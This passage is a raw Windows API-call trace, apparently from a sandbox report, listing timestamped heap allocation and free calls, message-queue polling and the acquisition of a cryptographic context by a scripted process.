hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.778] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0257.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0257.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0257.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0257.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0257.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.779] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0257.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0257.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0257.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.782] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0257.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0257.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0257.783] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0257.783] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0257.783] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0257.784] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0257.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0257.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0257.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.784] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0257.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0257.785] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.785] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.785] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0257.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0257.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0257.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0257.786] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0257.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0257.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0257.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.788] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0257.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 